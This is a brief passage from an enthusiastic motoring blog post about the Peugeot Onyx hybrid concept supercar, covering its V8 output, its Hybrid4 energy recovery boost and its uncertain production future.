Now, no supercar can be without bucket-loads of oomph and some sizeable grunt. The word ‘hybrid’ appearing on the Onyx spec-sheet may have thrown doubt onto that theory in this instance, but fortunately ‘600bhp’ is also in there, compliments of the beating 3.7-litre V8 under the bonnet.

Delivered through the rear Michelins via a six-speed sequential gearbox, the power output can actually increase by 80bhp thanks to the onboard Hybrid4 kinetic energy recovery system. This additional power is stored in the lithium-ion batteries and utilized immediately under acceleration.

Now there’s no official confirmed production plans for the Onyx as of yet, the model primarily a celebration of Peugeot’s 202 years in business. crankandpiston though certainly hopes to see this pseudo-batmobile on the road in the near future, and not just for the bonkers looks and the lunatic power….

Imagine being able to say “my other car’s a Peugeot” without any hint of irony!
